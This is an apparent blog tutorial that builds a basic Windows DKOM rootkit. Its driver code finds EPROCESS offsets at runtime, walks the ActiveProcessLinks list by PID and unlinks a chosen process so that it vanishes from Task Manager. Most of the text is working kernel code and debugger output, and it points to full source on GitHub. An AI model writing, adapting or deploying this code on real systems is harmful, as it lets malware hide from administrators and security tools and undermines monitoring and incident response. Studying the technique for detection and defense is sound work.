
A Basic Windows DKOM Rootkit

This article outlines the creation of a simple Windows Direct Kernel Object Manipulation (DKOM) rootkit. While the underlying concepts are simple, it took me a little while to figure out how to interact with some of the more obscure Windows structures and actually implement a working proof of concept. Hopefully this article helps out the next amateur.

All source code is on GitHub: Hide Process. Here is a screenshot demonstrating the result, hiding the notepad.exe process (tested on 32-bit Windows 7):

Background: The EPROCESS Linked List

The Windows kernel keeps a doubly linked list of Executive Process (EPROCESS) structures to track currently executing processes, and tools such as Task Manager get their process listing from it. The EPROCESS blocks reside in system address space (kernel land) and contain a great deal of information about a process. Each block also references a number of related structures used internally by the operating system: the KPROCESS block, the KTHREAD blocks, and all of the ETHREAD blocks that represent the one or more threads that make up the process.

The EPROCESS block is laid out in memory like so (offsets are OS version and architecture dependent; the output below is from 32-bit Windows 7):

kd> dt _eprocess
nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER
   +0x0a8 ExitTime         : _LARGE_INTEGER
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : Ptr32 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY
   +0x0c0 ProcessQuotaUsage : [2] Uint4B
   +0x0c8 ProcessQuotaPeak : [2] Uint4B
   +0x0d0 CommitCharge     : Uint4B
   +0x0d4 QuotaBlock       : Ptr32 _EPROCESS_QUOTA_BLOCK
   +0x0d8 CpuQuotaBlock    : Ptr32 _PS_CPU_QUOTA_BLOCK
   +0x0dc PeakVirtualSize  : Uint4B
   +0x0e0 VirtualSize      : Uint4B
   +0x0e4 SessionProcessLinks : _LIST_ENTRY
   +0x0ec DebugPort        : Ptr32 Void
   +0x0f0 ExceptionPortData : Ptr32 Void
   +0x0f0 ExceptionPortValue : Uint4B
   +0x0f0 ExceptionPortState : Pos 0, 3 Bits
   +0x0f4 ObjectTable      : Ptr32 _HANDLE_TABLE
   +0x0f8 Token            : _EX_FAST_REF
   +0x0fc WorkingSetPage   : Uint4B
   +0x100 AddressCreationLock : _EX_PUSH_LOCK
   +0x104 RotateInProgress : Ptr32 _ETHREAD
   +0x108 ForkInProgress   : Ptr32 _ETHREAD
   +0x10c HardwareTrigger  : Uint4B
   +0x110 PhysicalVadRoot  : Ptr32 _MM_AVL_TABLE
   +0x114 CloneRoot        : Ptr32 Void
   +0x118 NumberOfPrivatePages : Uint4B
   +0x11c NumberOfLockedPages : Uint4B
   +0x120 Win32Process     : Ptr32 Void
   ...
   ... continue (very large structure)

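The ActiveProcessLinks field is the one we're most interested in. It is a _LIST_ENTRY structure embedded in the EPROCESS block (not a pointer to one), and it holds pointers to the ActiveProcessLinks entries of the processes immediately before (Blink) and immediately after (Flink) this one in the list. Because those pointers target the embedded entry rather than the start of the neighbouring EPROCESS block, we have to subtract the field's offset to get back to the block itself.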

typedef struct _LIST_ENTRY {

  struct _LIST_ENTRY *Flink;
  struct _LIST_ENTRY *Blink;

} LIST_ENTRY, *PLIST_ENTRY;
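
Because the list node is embedded inside a larger record, following a link lands in the middle of the neighbouring record rather than at its start. The user-mode sketch below illustrates how the owning record can be recovered by subtracting the field offset. The names mock_process, process_from_links, and next_pid_after are hypothetical stand-ins, not Windows definitions, and the layout is invented for the example.

```c
#include <stddef.h>

/* Same shape as LIST_ENTRY, redeclared so the sketch builds anywhere. */
typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} list_entry;

/* Hypothetical stand-in for EPROCESS: the list node sits mid-record. */
typedef struct mock_process {
    unsigned long pid;
    list_entry    links;
    char          name[16];
} mock_process;

/* Recover the owning record from a pointer to its embedded list node. */
static mock_process *process_from_links(list_entry *entry)
{
    return (mock_process *)((char *)entry - offsetof(mock_process, links));
}

/* Link two records into a two-element ring, then follow Flink from a
   and return the PID of the record that owns the entry we landed on. */
static unsigned long next_pid_after(mock_process *a, mock_process *b)
{
    a->links.Flink = a->links.Blink = &b->links;
    b->links.Flink = b->links.Blink = &a->links;
    return process_from_links(a->links.Flink)->pid;
}
```

This is the same arithmetic the driver code later performs when it subtracts the list offset from a Flink value.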

The image below is a good visualization of how the doubly linked list works. Each EPROCESS block contains a _LIST_ENTRY structure that integrates it into the list:

Theory: Removing oneself from the list.

At Blackhat in 2004, Jamie Butler, co-author of 'Rootkits: Subverting the Windows Kernel', described how a process could be removed from this doubly linked list and still continue executing. So how is this possible? It turns out that the process list is used for bookkeeping and enumeration, while the scheduler works on threads. So you can unlink an EPROCESS block from the ActiveProcessLinks list and the kernel will still schedule and run the threads (ETHREAD and KTHREAD structures) that make up the process.

So to hide our process we basically just need to remove the Nth item from a doubly linked list, that is, rewrite the pointers in the surrounding entries to point to one another, thus skipping over the Nth entry. (Excuse my lack of paint skills)

A quick example in C (we don't check if the item is at the end of the list because the ActiveProcessLinks list is circular on Windows):

#include <stddef.h>

// Minimal node type for the example
typedef struct myList {
  struct myList *next;
  struct myList *previous;
} myList;

// Head of a circular list, assumed to be populated elsewhere
static myList *start;

// Removes the node at position index (1-based, index >= 2).
// Not named remove() because that clashes with the C library function
void remove_node(int index)
{
  // Start from the head of the list
  myList *PreviousEntry = start;

  // Initialize easy to read variables
  myList *CurrentEntry = NULL;
  myList *NextEntry = NULL;

  int i = 1;

  // Iterate until you arrive at N-1
  while (i < (index - 1)) {
    PreviousEntry = PreviousEntry->next;
    i++;
  }

  // Set pointers to work with
  CurrentEntry = PreviousEntry->next;
  NextEntry = CurrentEntry->next;

  // Set the previous entry's fwd pointer
  PreviousEntry->next = NextEntry;

  // Set the next entry's reverse pointer
  NextEntry->previous = PreviousEntry;
}

However, iterating over the ActiveProcessLinks list isn't as simple as counting to N-1. We have to compare the PID of each process we visit with the one we're looking for, and if there's a match we enter our process hiding routine.
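
The search-by-identifier idea can be sketched in user mode on an ordinary circular list. This is only an illustration: the node type and the helpers find_by_id and make_ring are hypothetical, and the ring is assumed to contain at least one node.

```c
#include <stddef.h>

typedef struct node {
    struct node  *next;
    struct node  *previous;
    unsigned long id;
} node;

/* Walk the ring once starting at 'start'. Return the node whose id
   matches, or NULL after coming full circle without a match. */
static node *find_by_id(node *start, unsigned long id)
{
    node *current = start;
    do {
        if (current->id == id)
            return current;
        current = current->next;
    } while (current != start);
    return NULL;
}

/* Link an array of nodes into a circular doubly linked list. */
static void make_ring(node *nodes, size_t count)
{
    for (size_t i = 0; i < count; i++) {
        nodes[i].next     = &nodes[(i + 1) % count];
        nodes[i].previous = &nodes[(i + count - 1) % count];
    }
}
```

The loop terminates on the starting node rather than on NULL, which is the natural stop condition for a circular list.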

Implementation: The Hunt for an ActiveProcessLinks Pointer

So we know that we have to iterate over the ActiveProcessLinks list on Windows looking for the PID of our target process. But we still haven't determined how to find the ActiveProcessLinks list in the first place. We know that each process has a LIST_ENTRY in the list at some offset in its EPROCESS block, so obtaining a pointer to the EPROCESS block of our calling process is a good starting point. Luckily for us there is a kernel mode routine called PsGetCurrentProcess that returns a pointer to the EPROCESS block of the current process.

PEPROCESS PsGetCurrentProcess();

The routine itself backtracks from the ETHREAD pointer of the current calling thread to get to the EPROCESS block of the calling process, which is what Jamie Butler illustrates in his slides:



The slides illustrate the relationship between each structure; once we have an ETHREAD pointer we can proceed to the ApcState field in the KTHREAD structure, then finally to the EPROCESS block. And this is exactly what the routine PsGetCurrentProcess does! Looking closer at actual instructions it performs:

kd> uf nt!PsGetCurrentProcess
nt!PsGetCurrentProcess:
828bc13c 64a124010000    mov     eax,dword ptr fs:[00000124h]
828bc142 8b4050          mov     eax,dword ptr [eax+50h]
828bc145 c3              ret

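The first instruction loads the address of the current thread (its ETHREAD, which begins with the KTHREAD) from fs:[00000124h] into the EAX register. In kernel mode on x86 the FS segment points at the per-processor control region, and offset 0x124 within it holds the current thread pointer. The second instruction does not add 0x50 to that address; it reads the 4-byte pointer stored 0x50 bytes into the thread structure, which on this build is the Process member of ApcState, and returns it in EAX. So the EPROCESS pointer is found at [thread + 0x50], not at a fixed offset from FS. Note that on x64 the kernel uses the GS register for the per-processor region instead of FS.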
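
The second instruction in the listing, mov eax,[eax+50h], is a memory load rather than an addition: it fetches the pointer stored 0x50 bytes into the thread structure. A user-mode analogy, with hypothetical mock_thread and mock_process types whose layout is invented purely so that the pointer sits at offset 0x50:

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-ins; real thread and process layouts differ per build. */
typedef struct mock_process { unsigned long pid; } mock_process;

typedef struct mock_thread {
    unsigned char padding[0x50];  /* fields we do not care about here */
    mock_process *process;        /* pointer stored at offset 0x50    */
} mock_thread;

/* Analogue of "mov eax, [eax+50h]": read the pointer value stored
   0x50 bytes into the thread, instead of computing thread + 0x50. */
static mock_process *process_of(const mock_thread *thread)
{
    mock_process *p;
    memcpy(&p,
           (const unsigned char *)thread + offsetof(mock_thread, process),
           sizeof p);
    return p;
}
```

The returned value is whatever address was stored in that slot, so it bears no fixed relationship to the address of the thread structure itself.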

Implementation: Don't hardcode your offsets

After obtaining an EPROCESS pointer, we'll need to discover the PID of the process we're currently iterating over. Looking back at the EPROCESS structure we can see that the 6th field, at +0x0b4, is UniqueProcessId:

+0x0b4 UniqueProcessId  : Ptr32 Void

But ideally we don't want to hardcode our offsets, since they're OS version dependent and we'd like our rootkit to be portable across more than one OS/architecture. If we select a process whose PID we already know and step through its _EPROCESS structure 4 bytes at a time, we can compare each value to the PID (ULONG) and discover the offset. We'll use 3 different processes to cross-check the result and make sure that finding the PID in memory at that location wasn't a fluke.

ULONG find_eprocess_pid_offset() {

  ULONG pid_ofs = 0;    // The offset we're looking for (0 means not found)
  int idx = 0;          // Number of processes collected so far
  ULONG pids[3];        // List of PIDs for our 3 processes
  PEPROCESS eprocs[3];  // Process list, will contain 3 processes

  // Select 3 process PIDs and get their EPROCESS pointers.
  // The upper bound is arbitrary; it only keeps the loop finite
  // if fewer than 3 processes can be looked up
  for (ULONG i = 16; idx < 3 && i < 0x10000; i += 4)
  {
    if (NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)i, &eprocs[idx])))
    {
      pids[idx] = i;
      idx++;
    }
  }

  /*
  Go through the EPROCESS structure and look for the PID.
  We can start at 0x20 because UniqueProcessId should
  not be in the first 0x20 bytes, and we give up after
  0x200 bytes with no success. Only scan if all 3
  lookups succeeded, otherwise eprocs[] is incomplete
  */
  for (int i = 0x20; idx == 3 && i < 0x200; i += 4)
  {
    if ((*(ULONG *)((UCHAR *)eprocs[0] + i) == pids[0])
      && (*(ULONG *)((UCHAR *)eprocs[1] + i) == pids[1])
      && (*(ULONG *)((UCHAR *)eprocs[2] + i) == pids[2]))
    {
      pid_ofs = i;
      break;
    }
  }

  // Release the references taken by PsLookupProcessByProcessId
  for (int i = 0; i < idx; i++)
  {
    ObDereferenceObject(eprocs[i]);
  }

  return pid_ofs;
}
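
The cross-checking idea is easier to see outside the kernel. The following user-mode sketch scans three records of a made-up layout for the offset at which each one holds its own known identifier. The mock_record type and find_id_offset are hypothetical, and unlike the driver routine this version reports failure with SIZE_MAX so that offset 0 remains a valid answer.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical record: the scanner pretends not to know where 'id' lives. */
typedef struct mock_record {
    uint32_t flags;
    uint32_t counters[5];
    uint32_t id;
    uint32_t trailer[4];
} mock_record;

/* Return the first 4-byte-aligned offset at which every record holds
   its own known id, or SIZE_MAX if no offset satisfies all records. */
static size_t find_id_offset(const mock_record *recs,
                             const uint32_t *ids, size_t count)
{
    for (size_t off = 0; off + sizeof(uint32_t) <= sizeof(mock_record);
         off += sizeof(uint32_t)) {
        size_t matches = 0;
        for (size_t i = 0; i < count; i++) {
            uint32_t value;
            memcpy(&value, (const unsigned char *)&recs[i] + off, sizeof value);
            if (value == ids[i])
                matches++;
        }
        if (matches == count)
            return off;
    }
    return SIZE_MAX;
}
```

Requiring every record to agree is what filters out a coincidental match, such as an unrelated field in one record that happens to equal that record's identifier.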

Once we know the PID offset, it's easy to obtain the ActiveProcessLinks offset. In the structure dump above, ActiveProcessLinks is the field immediately after UniqueProcessId, and UniqueProcessId is pointer-sized, so we simply need to add 4 bytes on 32-bit or 8 bytes on 64-bit. A good way to determine which architecture our driver is compiled for is to check the pointer size: a 32-bit build has 4-byte pointers and a 64-bit build has 8-byte pointers. Microsoft's INT_PTR datatype is defined to be the size of a pointer on both 32-bit and 64-bit Windows:

// Get PID offset 
ULONG PID_OFFSET = find_eprocess_pid_offset();

// Initialize LIST_ENTRY offset 
ULONG LIST_OFFSET = PID_OFFSET;

// Check Architecture using pointer size
INT_PTR ptr;

// Ptr size 8 if compiled for a 64-bit machine
// 4 if compiled for 32-bit machine
LIST_OFFSET += sizeof(ptr);

Then, depending on the result, 4 or 8 bytes will be added to the PID_OFFSET to determine the LIST_ENTRY offset.
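
As a sanity check on that arithmetic, here is a small user-mode sketch using a hypothetical two-field excerpt (mock_excerpt) that mirrors only the ordering of the two fields, a pointer-sized ID followed directly by the list entry. It is not the real EPROCESS layout, and list_offset_from is an illustrative helper name.

```c
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} list_entry;

/* Hypothetical excerpt: a pointer-sized id followed directly by the list node. */
typedef struct mock_excerpt {
    void      *UniqueProcessId;
    list_entry ActiveProcessLinks;
} mock_excerpt;

/* Derive the list offset from the id offset by adding one pointer width. */
static size_t list_offset_from(size_t pid_offset)
{
    return pid_offset + sizeof(void *);
}
```

With the 32-bit dump shown earlier this gives 0x0b4 + 4 = 0x0b8, which matches the listed offset of ActiveProcessLinks. The shortcut only holds while the two fields stay adjacent.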

Implementation: Show me the code

Now let's take our Nth item removal concept from the theory section and implement it for EPROCESS blocks.

// Here we go!

PCHAR modifyTaskList(UINT32 pid) {


  // Get PID offset nt!_EPROCESS.UniqueProcessId
  ULONG PID_OFFSET = find_eprocess_pid_offset();

  // Check if offset discovery was successful 
  if (PID_OFFSET == 0) {
    return (PCHAR)"Could not find PID offset!";
  }

  // Allocate the status buffer only after the early return above, so it
  // is not leaked. 64 bytes comfortably holds the message and two ULONGs
  const SIZE_T RESULT_SIZE = 64;
  LPSTR result = ExAllocatePool(NonPagedPool, RESULT_SIZE);
  if (result == NULL) {
    return (PCHAR)"Could not allocate result buffer!";
  }

  // Get LIST_ENTRY offset nt!_EPROCESS.ActiveProcessLinks
  ULONG LIST_OFFSET = PID_OFFSET;

  // Check Architecture using pointer size
  INT_PTR ptr;

  // Ptr size 8 if compiled for a 64-bit machine, 4 if compiled for 32-bit machine
  LIST_OFFSET += sizeof(ptr);

  // Record offsets for usermode buffer; the size passed here must match the allocation
  sprintf_s(result, RESULT_SIZE, "Found offsets: %lu & %lu", PID_OFFSET, LIST_OFFSET);

  // Get current process
  PEPROCESS CurrentEPROCESS = PsGetCurrentProcess();

  // Initialize other variables
  PLIST_ENTRY CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
  PUINT32 CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);

  // Check self 
  if (*(UINT32 *)CurrentPID == pid) {
    remove_links(CurrentList);
    return (PCHAR)result;
  }
  
  // Record the starting position
  PEPROCESS StartProcess = CurrentEPROCESS;
  
  // Move to next item
  CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
  CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
  CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);

  // Loop until we find the right process to remove
  // Or until we circle back
  while ((ULONG_PTR)StartProcess != (ULONG_PTR)CurrentEPROCESS) {

    // Check item
    if (*(UINT32 *)CurrentPID == pid) {
      remove_links(CurrentList);
      return (PCHAR)result;
    } 

    // Move to next item
    CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
    CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
    CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
  } 

  return (PCHAR)result; 
}

And finally the actual removal:

void remove_links(PLIST_ENTRY Current) {

  PLIST_ENTRY Previous, Next;

  Previous = (Current->Blink);
  Next = (Current->Flink);

  // Bypass the current entry (connect previous with next)
  Previous->Flink = Next;
  Next->Blink = Previous;

  // Re-write the current LIST_ENTRY to point to itself (avoiding BSOD
  // if the entry is unlinked again later, e.g. when the process exits)
  Current->Blink = Current;
  Current->Flink = Current;

  return;
  
}
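
The self-pointing step is worth a closer look. A plain unlink writes through the entry's own Flink and Blink, so if a removed entry kept its stale neighbour pointers, a second unlink (presumably what happens when the process is eventually torn down) would scribble on list nodes it no longer belongs to. The user-mode sketch below, with hypothetical helpers unlink_entry, hide_entry, and make_ring3, shows that a self-linked entry can be unlinked again without touching the rest of the list.

```c
#include <stddef.h>

typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} list_entry;

/* Plain unlink: writes through the entry's own neighbour pointers. */
static void unlink_entry(list_entry *e)
{
    e->Blink->Flink = e->Flink;
    e->Flink->Blink = e->Blink;
}

/* Unlink, then turn the entry into a one-element ring of its own. */
static void hide_entry(list_entry *e)
{
    unlink_entry(e);
    e->Flink = e;
    e->Blink = e;
}

/* Build the ring a -> b -> c -> a. */
static void make_ring3(list_entry *a, list_entry *b, list_entry *c)
{
    a->Flink = b; b->Flink = c; c->Flink = a;
    a->Blink = c; b->Blink = a; c->Blink = b;
}
```

After hide_entry on the middle node, a second unlink_entry on it only rewrites that node's own pointers, and the remaining two-node ring is left intact.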

That's all! Hope it was somewhat informative.


References:

Blackhat 2004 - Jamie Butler

Wikipedia: Direct Kernel Object Manipulation